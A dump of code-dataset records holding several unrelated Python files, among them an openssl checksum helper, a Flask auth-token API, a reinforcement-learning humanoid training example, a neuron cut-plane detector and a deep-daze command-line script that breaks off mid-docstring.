1\n\ndef generate_init_func():\n gen_time = datetime.datetime.utcnow().strftime(\"%a %b %d %Y %H:%M:%S UTC\")\n output_cpp(\"// This file was automatically generated using tools/process_csv.py\")\n output_cpp(\"// Generated on \" + gen_time)\n output_header_cpp(\"// This file was automatically generated using tools/process_csv.py\")\n output_header_cpp(\"// Generated on \" + gen_time)\n generate_init_cpp()\n generate_windows_cpp()\n\n output_asm(\"; This file was automatically generated using tools/process_csv.py\")\n output_asm(\"; Generated on \" + gen_time)\n if arch == \"x86\":\n generate_init_func_x86(32)\n if arch == \"x64\":\n generate_init_func_x86(64)\n if arch == \"armeabi-v7a\":\n print(arch + \" not supported\")\n #generate_init_func_arm()\n\nfor file_path in in_files:\n print(\"Parsing Symbol Map:\" + file_path)\n file_full_path = os.path.abspath(file_path)\n with open(file_path, \"r\") as f:\n read_json(f)\ngenerate_init_func()\nprint(cxx_output)\nprint(asm_output)\nout_file_cpp.close()\nout_file_cpp.close()\nout_file_asm.close()","sub_path":"source/process_headers.py","file_name":"process_headers.py","file_ext":"py","file_size_in_byte":12145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"618282946","text":"# inspired by by https://github.com/shash873/simple-file-checksum/\n\nimport asyncio\nimport logging\nfrom enum import Enum\nfrom pathlib import Path\n\nfrom .exceptions import ExporterException\n\nlog = logging.getLogger(__name__)\n\n\nclass Algorithm(Enum):\n \"\"\"Maps openssl supported algorighms with produced output size\"\"\"\n\n MD5 = 32\n SHA1 = 40\n SHA256 = 64\n SHA384 = 96\n SHA512 = 128\n\n\nasync def checksum(file_path: Path, algorithm=Algorithm.SHA256) -> str:\n \"\"\"Calls underlying openssl for hashing\"\"\"\n\n str_file_path = str(file_path)\n if not file_path.is_file():\n raise ExporterException(f\"Provided path '{str_file_path}' is not a file\")\n\n command_args = [\"openssl\", \"dgst\", f\"-{algorithm.name}\", str_file_path]\n proc = await asyncio.create_subprocess_exec(\n *command_args,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n stdout, stderr = await proc.communicate()\n decoded_stdout = stdout.decode()\n\n if proc.returncode != 0:\n log.warning(\"STDOUT: %s\", decoded_stdout)\n log.warning(\"STDERR: %s\", stderr.decode())\n raise ExporterException(\n f\"Could not digest with algorithm={algorithm.name} of file={str_file_path}\"\n )\n\n digest: str = decoded_stdout.strip().split(\" \")[-1]\n if len(digest) != algorithm.value:\n raise ExporterException(\n f\"Expected digest len={algorithm.value} for algorithm={algorithm.name}\"\n f\", got len={len(digest)} for digest={digest}\"\n )\n\n return digest\n","sub_path":"services/web/server/src/simcore_service_webserver/exporter/async_hashing.py","file_name":"async_hashing.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"251712462","text":"import unittest\nfrom sentiment_analysis import SentimentAnalysisSpanish\n\nclass TestSentimentAnalysis(unittest.TestCase):\n \n def test_sum(self):\n sentiment = SentimentAnalysisSpanish()\n test_sentences_positive = [\"prados bellos y alegres a mi alrededor, felicidad, viva la vida\", \"me encantan los gatos y cantar, disfruto mucho\", \"que buena noticia me alegro\"]\n\n test_sentences_negative = [\"estoy muy enfadado y molesto y no quiero hablar\", \"me parece terrible esto que me estás diciendo\", \"fuera de aquí no quiero verte\"]\n\n for text in test_sentences_positive:\n print(text)\n sentiment_result = sentiment.sentiment(text)\n print(sentiment_result)\n print(\"--------\")\n self.assertGreater(sentiment_result, 0.5, \"Sentiment should be possitive\")\n \n for text in test_sentences_negative:\n print(text)\n sentiment_result = sentiment.sentiment(text)\n print(sentiment_result)\n print(\"--------\")\n self.assertLess(sentiment_result, 0.5, \"Sentiment should be negative\")\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"sentiment_analysis_spanish/test_sentiment_analysis.py","file_name":"test_sentiment_analysis.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"363672776","text":"from django import template\r\nfrom django.conf import settings\r\n\r\nfrom account.utils import user_display\r\n\r\n\r\n\r\nregister = template.Library()\r\n\r\n\r\n\r\nclass UserDisplayNode(template.Node):\r\n def __init__(self, user, as_var=None):\r\n self.user_var = template.Variable(user)\r\n self.as_var = as_var\r\n \r\n def render(self, context):\r\n user = self.user_var.resolve(context)\r\n \r\n display = user_display(user)\r\n \r\n if self.as_var:\r\n context[self.as_var] = display\r\n return \"\"\r\n return display\r\n\r\n\r\n@register.tag(name=\"user_display\")\r\ndef do_user_display(parser, token):\r\n \"\"\"\r\n Example usage::\r\n \r\n {% user_display user %}\r\n \r\n or if you need to use in a {% blocktrans %}::\r\n \r\n {% user_display user as user_display}\r\n {% blocktrans %}{{ user_display }} has sent you a gift.{% endblocktrans %}\r\n \r\n \"\"\"\r\n bits = token.split_contents()\r\n \r\n if len(bits) == 2:\r\n user = bits[1]\r\n as_var = None\r\n elif len(bits) == 4:\r\n user = bits[1]\r\n as_var = bits[3]\r\n else:\r\n raise template.TemplateSyntaxError(\"'%s' takes either two or four arguments\" % bits[0])\r\n \r\n return UserDisplayNode(user, as_var)\r\n","sub_path":"colab/apps/account/templatetags/account_tags.py","file_name":"account_tags.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"323141960","text":"# Import the database object from the main app module\nimport json\nimport logging\nimport uuid\nimport datetime\n\nimport Failures\nfrom app import db\nfrom app.User import services as user_service\n\nfrom flask_restful import Resource, Api\nfrom flask import request, Blueprint\n\nfrom Validation import Validation\n\nfrom models import AuthenticationToken\n\nauth_token_app = Blueprint('authtoken', __name__, url_prefix='/authtoken')\napi = Api(auth_token_app)\n\n\nclass AuthTokensRequest(Resource):\n\n def post(self):\n # Get values\n server = request.headers.get('server')\n id_user = request.form.get('idUser')\n browser = request.form.get('browser')\n ip_address = request.form.get('ipAddress')\n\n # Validate required fields\n validation = Validation()\n validation.add_required_field('server', server)\n validation.add_required_field('idUser', id_user)\n validation.add_required_field('browser', browser)\n validation.add_required_field('ipAddress', ip_address)\n if not validation.is_valid():\n return validation.get_validation_response()\n\n # Parse numbers\n try:\n id_user = int(id_user)\n except:\n return Failures.not_a_number('idUser', id_user)\n\n # Validate user exists, is validated and is not blocked\n user = user_service.get_user(id_user)\n if user is None:\n return Failures.unknown_user_id(id_user)\n if not user.confirmed:\n return Failures.email_not_confirmed()\n if user.blocked:\n return Failures.user_blocked()\n\n # Delete expired tokens\n AuthenticationToken.query.filter(AuthenticationToken.validity < datetime.datetime.now()).delete()\n db.session.flush()\n\n # Generate token\n token = str(uuid.uuid1())\n\n # Save token and browser information\n authentication_token = AuthenticationToken()\n authentication_token.id_user = id_user\n authentication_token.browser = browser\n authentication_token.server = server\n authentication_token.ip_address = ip_address\n authentication_token.validity = datetime.datetime.now() + datetime.timedelta(minutes=120)\n authentication_token.token = token\n db.session.add(authentication_token)\n db.session.commit()\n\n logging.info('AuthToken-controller: Request auth token: success: %s -> %s*****', user.id, token[0:6])\n\n return {'success': True, 'token': token}\n\n\nclass GetAuthTokens(Resource):\n\n def post(self, id_user):\n # Get values\n server = request.headers.get('server')\n browser = request.form.get('browser')\n ip_address = request.form.get('ipAddress')\n\n # Validate required fields\n validation = Validation()\n validation.add_required_field('server', server)\n validation.add_required_field('idUser', id_user)\n validation.add_required_field('browser', browser)\n validation.add_required_field('ipAddress', ip_address)\n if not validation.is_valid():\n return validation.get_validation_response()\n\n # Parse numbers\n try:\n id_user = int(id_user)\n except:\n return Failures.not_a_number('idUser', id_user)\n\n authentication_token_models = AuthenticationToken.query.filter_by(\n id_user=id_user,\n # browser=browser,\n # server=server,\n # ip_address=ip_address\n ).all()\n\n authentication_tokens = []\n for authentication_token_model in authentication_token_models:\n authentication_tokens.append(authentication_token_model.token)\n\n logging.info('AuthToken-controller: Get auth tokens: success: %s -> %s tokens', id_user,\n len(authentication_tokens))\n\n return authentication_tokens\n\napi.add_resource(AuthTokensRequest, '/request')\napi.add_resource(GetAuthTokens, '/tokens/')\n","sub_path":"app/AuthToken/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"321736553","text":"import pygame\r\nfrom pygame import *\r\nfrom random import randint\r\n\r\nWIDTH = HEIGHT = 96\r\n\r\nclass Item(sprite.Sprite):\r\n\tdef __init__(self, startPos, value):\r\n\t\tsprite.Sprite.__init__(self)\r\n\t\tself.startX,self.startY = startPos\r\n\t\tself.speed = randint(2,8)\r\n\t\tself.value = value\r\n\t\t\r\n\t\tif value == 2:\r\n\t\t\tself.effect = -5\r\n\t\telif value == 3:\r\n\t\t\tself.effect = -1\r\n\t\telif value == 4:\r\n\t\t\tself.effect = 1\r\n\t\telse:\r\n\t\t\tself.effect = 2\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\tself.image = Surface((WIDTH,HEIGHT))\r\n\t\tself.image = image.load(\"textures/\" + str(value) + \".png\")\r\n\t\tself.rect = Rect(self.startX, self.startY, WIDTH, HEIGHT)\r\n\t\r\n\tdef update(self):\r\n\t\tself.rect.y += self.speed\r\n\t\t","sub_path":"BOTAN/ocenki.py","file_name":"ocenki.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472295698","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom mushroom_rl.utils.callbacks import PlotDataset\nfrom mushroom_rl.utils.preprocessors import MinMaxPreprocessor\n\nfrom mushroom_rl.algorithms.actor_critic import SAC\nfrom mushroom_rl.core import Core\nfrom mushroom_rl.utils.dataset import compute_J, episodes_length\n\nfrom mushroom_rl.environments.mujoco_envs import HumanoidGait\nfrom mushroom_rl.environments.mujoco_envs.humanoid_gait import \\\n VelocityProfile3D, RandomConstantVelocityProfile, ConstantVelocityProfile\n\n\nclass CriticNetwork(nn.Module):\n def __init__(self, input_shape, output_shape, n_features, **kwargs):\n super(CriticNetwork, self).__init__()\n\n n_input = input_shape[-1]\n n_output = output_shape[0]\n\n self._in = nn.Linear(n_input, n_features[0])\n self._h1 = nn.Linear(n_features[0], n_features[1])\n self._out = nn.Linear(n_features[1], n_output)\n\n nn.init.xavier_uniform_(self._in.weight,\n gain=nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(self._h1.weight,\n gain=nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(self._out.weight,\n gain=nn.init.calculate_gain('linear'))\n\n def forward(self, state, action):\n in_feats = torch.cat((state.float(), action.float()), dim=1)\n feats = F.relu(self._in(in_feats))\n feats = F.relu(self._h1(feats))\n\n out = self._out(feats)\n return torch.squeeze(out)\n\n\nclass ActorNetwork(nn.Module):\n def __init__(self, input_shape, output_shape, n_features, **kwargs):\n super(ActorNetwork, self).__init__()\n\n n_input = input_shape[-1]\n n_output = output_shape[0]\n\n self._in = nn.Linear(n_input, n_features[0])\n self._h1 = nn.Linear(n_features[0], n_features[1])\n self._out = nn.Linear(n_features[1], n_output)\n\n nn.init.xavier_uniform_(self._in.weight,\n gain=nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(self._h1.weight,\n gain=nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(self._out.weight,\n gain=nn.init.calculate_gain('linear'))\n\n def forward(self, state):\n in_feats = torch.squeeze(state, 1).float()\n\n feats = F.relu(self._in(in_feats))\n feats = F.relu(self._h1(feats))\n\n out = self._out(feats)\n return out\n\n\ndef create_SAC_agent(mdp, use_cuda=None):\n if use_cuda is None:\n use_cuda = torch.cuda.is_available()\n\n # Settings\n actor_mu_network = ActorNetwork\n actor_sigma_network = ActorNetwork\n network_layers_actor_mu = (512, 256)\n network_layers_actor_sigma = (512, 256)\n network_layers_critic = (512, 256)\n\n initial_replay_size = 3000\n max_replay_size = 100000\n batch_size = 256\n warmup_transitions = 5000\n tau = 0.005\n\n lr_alpha = 2e-6\n lr_actor = 2e-5\n lr_critic = 4e-5\n weight_decay_actor = 0.0\n weight_decay_critic = 0.0\n\n target_entropy = -22.0\n\n # Approximator\n actor_input_shape = mdp.info.observation_space.shape\n actor_mu_params = dict(network=actor_mu_network,\n n_features=network_layers_actor_mu,\n input_shape=actor_input_shape,\n output_shape=mdp.info.action_space.shape,\n use_cuda=use_cuda)\n\n actor_sigma_params = dict(network=actor_sigma_network,\n n_features=network_layers_actor_sigma,\n input_shape=actor_input_shape,\n output_shape=mdp.info.action_space.shape,\n use_cuda=use_cuda)\n\n actor_optimizer = {'class': optim.Adam,\n 'params': {'lr': lr_actor, 'weight_decay': weight_decay_actor}}\n\n critic_input_shape = (actor_input_shape[0] + mdp.info.action_space.shape[0],)\n critic_params = dict(network=CriticNetwork,\n optimizer={'class': optim.Adam,\n 'params': {'lr': lr_critic, 'weight_decay': weight_decay_critic}},\n loss=F.mse_loss,\n n_features=network_layers_critic,\n input_shape=critic_input_shape,\n output_shape=(1,),\n use_cuda=use_cuda)\n\n # create SAC agent\n agent = SAC(mdp_info=mdp.info,\n batch_size=batch_size, initial_replay_size=initial_replay_size,\n max_replay_size=max_replay_size,\n warmup_transitions=warmup_transitions, tau=tau, lr_alpha=lr_alpha,\n actor_mu_params=actor_mu_params, actor_sigma_params=actor_sigma_params,\n actor_optimizer=actor_optimizer, critic_params=critic_params,\n target_entropy=target_entropy, critic_fit_params=None)\n\n return agent\n\n\ndef create_mdp(gamma, horizon, goal, use_muscles):\n if goal == \"trajectory\" or goal == \"com_vel_trajectory\":\n mdp = HumanoidGait(gamma=gamma, horizon=horizon, n_intermediate_steps=10,\n goal_reward=goal,\n goal_reward_params=dict(use_error_terminate=True),\n use_muscles=use_muscles,\n obs_avg_window=1, act_avg_window=1)\n\n elif goal == \"max_vel\":\n mdp = HumanoidGait(gamma=gamma, horizon=horizon, n_intermediate_steps=10,\n goal_reward=goal,\n goal_reward_params=dict(traj_start=True),\n use_muscles=use_muscles,\n obs_avg_window=1, act_avg_window=1)\n\n elif goal == \"vel_profile\":\n velocity_profile = dict(profile_instance=VelocityProfile3D([\n RandomConstantVelocityProfile(min=0.5, max=2.0),\n ConstantVelocityProfile(0),\n ConstantVelocityProfile(0)]))\n\n mdp = HumanoidGait(gamma=gamma, horizon=horizon, n_intermediate_steps=10,\n goal_reward=goal,\n goal_reward_params=dict(traj_start=True,\n **velocity_profile),\n use_muscles=use_muscles,\n obs_avg_window=1, act_avg_window=1)\n else:\n raise NotImplementedError(\"Invalid goal selected, try one of \"\n \"['trajectory', 'com_vel_trajectory', 'vel_profile', 'max_vel']\")\n return mdp\n\n\ndef experiment(goal, use_muscles, n_epochs, n_steps, n_episodes_test):\n np.random.seed(1)\n\n # MDP\n gamma = 0.99\n horizon = 2000\n mdp = create_mdp(gamma, horizon, goal, use_muscles=use_muscles)\n\n # Agent\n agent = create_SAC_agent(mdp)\n\n # normalization callback\n normalizer = MinMaxPreprocessor(mdp_info=mdp.info)\n\n # plotting callback\n plotter = PlotDataset(mdp.info)\n\n # Algorithm(with normalization and plotting)\n core = Core(agent, mdp, callback_step=plotter, preprocessors=[normalizer])\n\n # training loop\n for n in range(n_epochs):\n core.learn(n_steps=n_steps, n_steps_per_fit=1)\n dataset = core.evaluate(n_episodes=n_episodes_test, render=True)\n print('Epoch: ', n,\n ' J: ', np.mean(compute_J(dataset, gamma)),\n ' Len_ep: ', int(np.round(np.mean(episodes_length(dataset))))\n )\n\n print('Press a button to visualize humanoid')\n input()\n core.evaluate(n_episodes=10, render=True)\n\n\nif __name__ == '__main__':\n goal = [\"trajectory\", \"com_vel_trajectory\", \"vel_profile\", \"max_vel\"]\n experiment(goal=goal[0], use_muscles=True,\n n_epochs=250, n_steps=10000, n_episodes_test=10)","sub_path":"examples/humanoid_sac.py","file_name":"humanoid_sac.py","file_ext":"py","file_size_in_byte":7861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538385011","text":"#!/usr/bin/python\n\n###############################################################################\n# ex. python create-invitations.py --conf MyConf.org/2017 --baseurl http://localhost:3000\n# --username admin --password admin_pw\n#\n# To be run after submission due date to create review invitations for all the papers.\n# For each paper:\n# 1) create authorGroup (can see reviews, can't write a review)\n# reviewer group (reviewers for this paper)\n# and nonReviewerGroup (folks that aren't allowed to read the review at least not yet)\n# 2) create review invitation\n###############################################################################\n\n## Import statements\nimport argparse\nfrom openreview import *\nimport config\n\n## Argument handling\nparser = argparse.ArgumentParser()\nparser.add_argument('--baseurl', help=\"base url\")\nparser.add_argument('--username')\nparser.add_argument('--password')\n\nargs = parser.parse_args()\n\n## Initialize the client library with username and password\nclient = Client(baseurl=args.baseurl, username=args.username, password=args.password)\nprint(\"Connecting to \"+client.baseurl)\n\nblind_submissions = client.get_notes(invitation=config.BLIND_SUBMISSION)\nfor paper in blind_submissions:\n paper_num = str(paper.number)\n paperinv = config.CONFERENCE_ID + '/-/Paper' + paper_num\n paperGroup = config.CONFERENCE_ID + '/Paper' + paper_num\n authorGroup = paperGroup+'/Authors'\n\n ## Reviewer group - people that can see the review invitation\n reviewerGroup = paperGroup + '/Reviewers'\n try:\n client.get_group(id=reviewerGroup)\n print(\"Found \"+reviewerGroup)\n except openreview.OpenReviewException as e:\n # is group not found, then make groups and invites\n if e.args[0][0].startswith('Group Not Found'):\n print(\"Create \"+reviewerGroup)\n client.post_group(openreview.Group(\n id=reviewerGroup,\n signatures=[config.CONFERENCE_ID],\n writers=[config.CONFERENCE_ID],\n members=[],\n readers=[config.CONFERENCE_ID, config.PROGRAM_CHAIRS],\n signatories=[]))\n\n ## Review\n review_reply = {\n 'forum': paper.id,\n 'replyto': paper.id,\n 'writers': {'values-regex': paperGroup + '/AnonReviewer[0-9]+'},\n 'signatures': {'values-regex': paperGroup + '/AnonReviewer[0-9]+'},\n 'readers': {\n 'values': ['everyone'],\n 'description': 'The users who will be allowed to read the above content.'\n },\n 'content': {\n 'title': {\n 'order': 1,\n 'value-regex': '.{0,500}',\n 'description': 'Brief summary of your review (up to 500 chars).',\n 'required': True\n },\n 'review': {\n 'order': 2,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Please provide an evaluation of the quality, clarity, originality and significance of this work, including a list of its pros and cons (up to 5000 chars).',\n 'required': True\n },\n 'rating': {\n 'order': 4,\n 'value-dropdown': [\n '5: Top 15% of accepted papers, strong accept',\n '4: Top 50% of accepted papers, clear accept',\n '3: Marginally above acceptance threshold',\n '2: Marginally below acceptance threshold',\n '1: Strong rejection'\n ],\n 'required': True\n },\n 'confidence': {\n 'order': 5,\n 'value-radio': [\n '3: The reviewer is absolutely certain that the evaluation is correct and very familiar with the relevant literature',\n '2: The reviewer is fairly confident that the evaluation is correct',\n '1: The reviewer\\'s evaluation is an educated guess'\n ],\n 'required': True\n }\n }\n }\n\n review_parameters = {\n 'readers': ['everyone'],\n 'writers': [config.CONFERENCE_ID],\n 'signatures': [config.CONFERENCE_ID],\n 'process': os.path.join(os.path.dirname(__file__), '../process/officialReviewProcess.js'),\n 'duedate': config.REVIEW_TIMESTAMP,\n 'reply': review_reply,\n 'invitees': [paperGroup + '/Reviewers']\n }\n invite = openreview.Invitation(paperinv + '/Official_Review', **review_parameters)\n client.post_invitation(invite)\n print(invite.id)\n","sub_path":"venues/NIPS.cc/2018/Workshop/IRASL/python/create-review-invitations.py","file_name":"create-review-invitations.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"78980637","text":"# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project\n# All rights reserved.\n#\n# This file is part of NeuroM \n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the copyright holder nor the names of\n# its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n'''Module for the detection of the cut plane'''\nimport logging\nimport operator\n\nimport numpy as np\nimport neurom as nm\n\nfrom neurom import viewer\nfrom neurom.core import Tree\nfrom neurom.core.dataformat import COLS\n\n\nL = logging.getLogger(__name__)\n\n\ndef _create_1d_distributions(points, bin_width):\n '''Create point histograms along each axis\n\n Parameters:\n points: a np.ndarray of points\n bin_width: the bin width\n\n Returns: a dict of the X, Y and Z 1D histograms'''\n min_, max_ = np.min(points, axis=0), np.max(points, axis=0)\n hist = dict()\n for i, plane in enumerate('XYZ'):\n # Two binnings with same spacing but different offsets\n # first is attached to min_[i], last is attached to max_[i]\n binning_first_slice = np.arange(min_[i], max_[i] + bin_width, bin_width)\n binning_last_slice = np.arange(max_[i], min_[i] - bin_width, -bin_width)[::-1]\n hist[plane] = (np.histogram(points[:, i], bins=binning_first_slice),\n np.histogram(points[:, i], bins=binning_last_slice))\n return hist\n\n\ndef _get_probabilities(hist):\n '''Returns -log(p) where p is the a posteriori probabilities of the observed values\n in the bins X min, X max, Y min, Y max, Z min, Z max\n\n Parameters:\n hist: a dict of the X, Y and Z 1D histograms\n\n Returns: a dict of -log(p) values'''\n def minus_log_p(mu):\n '''Compute -Log(p) where p is the a posteriori probability to observe 0 counts\n in bin given than the mean value was \"mu\":\n The number of counts follows a Poisson law so the result is simply... mu\n demo: p(k|mu) = exp(-mu) * mu**k / k!\n p(0|mu) = exp(-mu)\n -log(p) = mu\n '''\n return mu\n\n for plane, (left, right) in hist.items():\n yield plane, 0, minus_log_p(left[0][0]), left\n yield plane, -1, minus_log_p(right[0][-1]), right\n\n\ndef _get_cut_leaves(neuron, cut_plane_and_position, tolerance):\n '''Returns leaves within cut plane tolerance'''\n cut_plane, position = cut_plane_and_position\n leaves = np.array([leaf.points[-1, COLS.XYZ]\n for neurite in neuron.neurites\n for leaf in nm.iter_sections(neurite, iterator_type=Tree.ileaf)])\n idx = 'XYZ'.find(cut_plane)\n return leaves[np.abs(leaves[:, idx] - position) < tolerance]\n\n\ndef draw_neuron(neuron, cut_plane_position, cut_leaves=None):\n '''Draw the neuron in the xy, yz and xz planes.\n\n Parameters:\n neuron: a Neuron\n cut_plane_position: a tuple (plane, position) like ('Z', 27)\n that can be specified to add the cut plane on\n the relevant plots\n cut_leaves: leaves to be highlighted by blue circles\n '''\n figures = dict()\n for draw_plane in ['yz', 'xy', 'xz']:\n fig, axes = viewer.draw(neuron, plane=draw_plane)\n figures[draw_plane] = (fig, axes)\n\n if cut_leaves is not None:\n import matplotlib\n slice_index = {'yz': [1, 2], 'xy': [0, 1], 'xz': [0, 2]}\n for point in cut_leaves:\n point_2d = point[slice_index[draw_plane]]\n axes.add_artist(matplotlib.patches.Circle(point_2d, radius=2))\n\n if cut_plane_position:\n cut_plane, position = cut_plane_position\n for axis, line_func in zip(draw_plane, ['axvline', 'axhline']):\n if axis == cut_plane.lower():\n getattr(axes, line_func)(position)\n return figures\n\n\ndef draw_dist_1d(hist, cut_position=None):\n '''Draw the 1D histograms, optionally also drawing a vertical line at cut_position'''\n import matplotlib.pyplot as plt\n fig = plt.figure()\n\n h, bins = hist\n plt.hist(bins[:-1], bins=bins, weights=h, label='Point distribution')\n plt.xlabel('Coordinate')\n plt.ylabel('Number of points')\n\n if cut_position:\n plt.gca().axvline(cut_position, color='r', label='Cut plane')\n plt.legend()\n return {'distrib_1d': (fig, plt.gca())}\n\n\ndef _get_status(minus_log_p):\n '''Returns ok if the probability that there is a cut plane is high enough'''\n _THRESHOLD = 50\n if minus_log_p < _THRESHOLD:\n return 'The probability that there is in fact NO cut plane is high: -log(p) = {0} !'\\\n .format(minus_log_p)\n return 'ok'\n\n\ndef find_cut_plane(neuron, bin_width=10, display=False):\n \"\"\"Find the cut plane\n\n Parameters:\n neuron: a Neuron object\n bin_width: The size of the binning\n display: where or not to display the control plots\n Note: It is the user responsability to call matplotlib.pyplot.show()\n\n Returns:\n A dictionary with the following items:\n status: 'ok' if everything went write, else an informative string\n cut_plane: a tuple (plane, position) where 'plane' is 'X', 'Y' or 'Z'\n and 'position' is the position\n cut_leaves: an np.array of all termination points in the cut plane\n figures: if 'display' option was used, a dict where values are tuples (fig, ax)\n for each figure\n details: A dict currently only containing -LogP of the bin where the cut plane was found\n\n 1) The distribution of all points along X, Y and Z is computed\n and put into 3 histograms.\n\n 2) For each histogram we look at the first and last empty bins\n (ie. the last bin before the histogram starts rising,\n and the first after it reaches zero again). Under the assumption\n that there is no cut plane, the posteriori probability\n of observing this empty bin given the value of the not-empty\n neighbour bin is then computed.\n 3) The lowest probability of the 6 probabilities (2 for each axes)\n corresponds to the cut plane\"\"\"\n\n points = np.array([point\n for neurite in (neuron.neurites or [])\n for section in nm.iter_sections(neurite)\n for point in section.points])\n if not points.size:\n return {'cut_leaves': None, 'status': \"Empty neuron\", 'cut_plane': None, 'details': None}\n\n hist = _create_1d_distributions(points, bin_width)\n\n cut_plane, side, minus_log_p, histo = max(_get_probabilities(hist), key=operator.itemgetter(2))\n\n cut_position = histo[1][side]\n cut_leaves = _get_cut_leaves(neuron, (cut_plane, cut_position), bin_width)\n\n result = {'cut_leaves': cut_leaves,\n 'status': _get_status(minus_log_p),\n 'details': {'-LogP': minus_log_p},\n 'cut_plane': (cut_plane, cut_position)}\n\n if display:\n result['figures'] = dict()\n result['figures'].update(draw_neuron(neuron, (cut_plane, cut_position), cut_leaves))\n result['figures'].update(draw_dist_1d(histo, cut_position))\n L.info('Trigger the plot display with: matplotlib.pyplot.show()')\n\n return result\n","sub_path":"neurom/apps/cut_plane_detection.py","file_name":"cut_plane_detection.py","file_ext":"py","file_size_in_byte":8607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"232242713","text":"import sys\n\nimport fire\n\nfrom deep_daze import Imagine\n\n\ndef train(\n text=None,\n img=None,\n learning_rate=1e-5,\n num_layers=16,\n batch_size=4,\n gradient_accumulate_every=4,\n epochs=20,\n iterations=1050,\n save_every=100,\n image_width=512,\n deeper=False,\n overwrite=False,\n save_progress=True,\n seed=None,\n open_folder=True,\n save_date_time=False,\n start_image_path=None,\n start_image_train_iters=50,\n theta_initial=None,\n theta_hidden=None,\n start_image_lr=3e-4,\n lower_bound_cutout=0.1,\n upper_bound_cutout=1.0,\n saturate_bound=False,\n create_story=False,\n story_start_words=5,\n story_words_per_epoch=5,\n save_gif=False\n):\n \"\"\"\n :param text: (required) A phrase less than 77 characters which you would like to visualize.\n :param img: The path to a jpg or png image which you would like to imagine. Can be combined with text.\n :param learning_rate: The learning rate of the neural net.\n :param num_layers: The number of hidden layers to use in the Siren neural net.\n :param batch_size: The number of generated images to pass into Siren before calculating loss. Decreasing this can lower memory and accuracy.\n :param gradient_accumulate_every: Calculate a weighted loss of n samples for each iteration. Increasing this can help increase accuracy with lower batch sizes.\n :param epochs: The number of epochs to run.\n :param iterations: The number of times to calculate and backpropagate loss in a given epoch.\n :param save_progress: Whether or not to save images generated before training Siren is complete.\n :param save_every: Generate an image every time iterations is a multiple of this number.\n :param open_folder: Whether or not to open a folder showing your generated images.\n :param overwrite: Whether or not to overwrite existing generated images of the same name.\n :param deeper: Uses a Siren neural net with 32 hidden layers.\n :param image_width: The desired resolution of the image.\n :param seed: A seed to be used for deterministic runs.\n :param save_date_time: Save files with a timestamp prepended e.g. `%y%m%d-%H%M%S-my_phrase_here.png`\n :param start_image_path: Path to the image you would like to prime the generator with initially\n :param start_image_train_iters: Number of iterations for priming, defaults to 50\n :param theta_initial: Hyperparameter describing the frequency of the color space. Only applies to the first layer of the network.\n :param theta_hidden: Hyperparameter describing the frequency of the color space. Only applies to the hidden layers of the network.\n :param start_image_lr: Learning rate for the start image training.\n :param upper_bound_cutout: The upper bound for the cutouts used in generation.\n :param lower_bound_cutout: The lower bound for the cutouts used in generation.\n :param saturate_bound: If True, the LOWER_BOUND_CUTOUT is linearly increased to 0.75 during training.\n :param create_story: Creates a story by optimizing each epoch on a new sliding-window of the input words. If this is enabled, much longer texts than 77 chars can be used. Requires save_progress to visualize the transitions of the story.\n :param story_start_words: Only used if create_story is True. How many words to optimize on for the first epoch.\n :param story_words_per_epoch: Only used if create_story is True. How many words to add to the optimization goal per epoch after the first one.\n :param save_gif: Only used if 